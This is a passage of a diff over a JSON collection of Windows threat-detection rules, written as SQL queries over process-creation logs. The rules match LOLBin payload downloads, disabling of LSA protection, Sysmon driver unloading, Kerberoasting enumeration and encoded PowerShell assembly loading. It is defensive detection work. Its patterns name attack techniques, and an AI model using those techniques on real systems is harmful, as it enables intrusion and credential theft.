'%\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dashost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\defrag.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dwm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName 
LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_icacls_deny.yml" + "filename": "proc_creation_win_susp_system_exe_anomaly.yml" }, { - "title": "Suspicious SYSVOL Domain Group Policy Access", - "id": "05f3c945-dcc8-4393-9f3d-af65077a8f86", - "status": "test", - "description": "Detects Access to Domain Group Policies stored in SYSVOL", - "author": "Markus Neis, Jonhnathan Ribeiro, oscd.community", + "title": "Use of VisualUiaVerifyNative.exe", + "id": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", + "status": "experimental", + "description": "VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ - "attack.credential_access", - "attack.t1552.006" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Administrative activity" + "Legitimate testing of Microsoft UI parts." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\SYSVOL\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\policies\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\VisualUiaVerifyNative.exe' ESCAPE '\\' OR OriginalFileName = 'VisualUiaVerifyNative.exe'))" ], - "filename": "proc_creation_win_susp_sysvol_access.yml" + "filename": "proc_creation_win_lolbin_visualuiaverifynative.yml" }, { - "title": "HH.EXE Execution", - "id": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", + "title": "Suspicious Microsoft Office Child Process", + "id": "438025f9-5856-4663-83f7-52f878a70a50", "status": "test", - "description": "Detects the usage of \"hh.exe\" executing recently modified .chm files.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", + "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", + "author": "Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io", "tags": [ "attack.defense_evasion", - "attack.t1218.001" + "attack.execution", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' AND CommandLine LIKE '%.chm%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR 
ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName 
LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_chm_execution.yml" + "filename": "proc_creation_win_office_susp_child_processes.yml" }, { - "title": "Non-privileged Usage of Reg or Powershell", - "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", - "status": "test", - "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", - "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], + "title": "Abusing IEExec To Download Payloads", + "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", + "status": "experimental", + "description": "Detects execution of the IEExec utility to 
download payloads", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND (CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" + "filename": "proc_creation_win_lolbin_ieexec_download.yml" }, { - "title": "Suspicious Regsvr32 HTTP IP Pattern", - "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", + "title": "LSA PPL Protection Disabled Via Reg.EXE", + "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", "status": "experimental", - "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", + "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.t1562.010" ], "falsepositives": [ - "FQDNs that start with a number" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND 
CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine LIKE '% /v RunAsPPL %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_http_pattern.yml" + "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" }, { - "title": "Potential SPN Enumeration Via Setspn.EXE", - "id": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", - "status": "test", - "description": "Detects service principal name (SPN) enumeration used for Kerberoasting", - "author": "Markus Neis, keepwatch", + "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", + "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", + "status": "experimental", + "description": "Detects active directory enumeration activity using known AdFind CLI flags", + 
"author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Administration activity" + "Authorized administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\setspn.exe' ESCAPE '\\' OR OriginalFileName = 'setspn.exe' OR (Description LIKE '%Query or reset the computer%' ESCAPE '\\' AND Description LIKE '%SPN attribute%' ESCAPE '\\')) AND CommandLine LIKE '%-q%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE '\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_setspn_spn_enumeration.yml" + "filename": "proc_creation_win_pua_adfind_enumeration.yml" }, { - "title": "Ruby Inline Command Execution", - "id": "20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8", + "title": "Potential WinAPI Calls Via CommandLine", + "id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", "status": "experimental", - "description": "Detects execution of ruby using the \"-e\" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.", + "description": "Detects the use of WinAPI Functions via the commandline. 
As seen used by threat actors via the tool winapiexec", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1106" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ruby.exe' ESCAPE '\\' OR OriginalFileName = 'ruby.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE 
'\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE '%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ruby_inline_command_execution.yml" + "filename": "proc_creation_win_susp_inline_win_api_access.yml" }, { - "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", - "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", + "title": "Potential Command Line Path Traversal Evasion Attempt", + "id": "1327381e-6ab0-4f38-b583-4c1b8346a56b", "status": "experimental", - "description": "Detects known WMI recon method to look for unquoted service paths using wmic. 
Often used by pentester and attacker enumeration scripts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Unknown" + "Google Drive", + "Citrix" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Windows\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\..\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\..\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.exe\\\\..\\\\%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\Google\\\\Drive\\\\googledrivesync.exe\\\\..\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\Citrix\\\\Virtual Smart Card\\\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\\\..\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" + "filename": "proc_creation_win_susp_commandline_path_traversal_evasion.yml" }, { - "title": "Sysmon Driver Unloaded Via Fltmc.EXE", - "id": "4d7cda18-1b12-4e52-b45c-d28653210df8", + "title": "PowerShell Base64 Encoded Reflective Assembly Load", + "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", "status": "test", - "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", - "author": "Kirill Kiryanov, oscd.community", + "description": "Detects base64 encoded .NET reflective loading of Assembly", + "author": "Christian 
Burkard (Nextron Systems), pH-T (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + "attack.t1027", + "attack.t1620" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" - }, - { - "title": "File Download Using ProtocolHandler.exe", - "id": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", - "status": "experimental", - "description": "Detects usage of \"ProtocolHandler\" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE)", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\protocolhandler.exe' ESCAPE '\\' OR OriginalFileName = 'ProtocolHandler.exe') AND ((CommandLine LIKE '%\"ms-word%' ESCAPE '\\' AND CommandLine LIKE '%.docx\"%' ESCAPE '\\') OR CommandLine LIKE '% http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE '%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE 
'%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE '%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_protocolhandler_download.yml" + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load.yml" }, { - "title": "Arbitrary Command Execution Using WSL", - "id": "dec44ca7-61ad-493c-bfd7-8819c5faa09b", + "title": "Suspicious Rundll32 Setupapi.dll Activity", + "id": "285b85b1-a555-4095-8652-a8a4106af63f", "status": "test", - "description": "Detects Possible usage of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary linux and windows commands", - "author": "oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali", + "description": "setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. 
This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.", + "author": "Konstantin Grishchenko, oscd.community", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1218.011" ], "falsepositives": [ - "Automation and orchestration scripts may use this method to execute scripts etc.", - "Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)" + "Scripts and administrative tools that use INF files for driver installation with setupapi.dll" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR OriginalFileName = 'wsl.exe') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --exec%' ESCAPE '\\' OR CommandLine LIKE '% --system%' ESCAPE '\\' OR CommandLine LIKE '% --shell-type %' ESCAPE '\\' OR CommandLine LIKE '% /mnt/c%' ESCAPE '\\' OR CommandLine LIKE '% --user root%' ESCAPE '\\' OR CommandLine LIKE '% -u root%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND 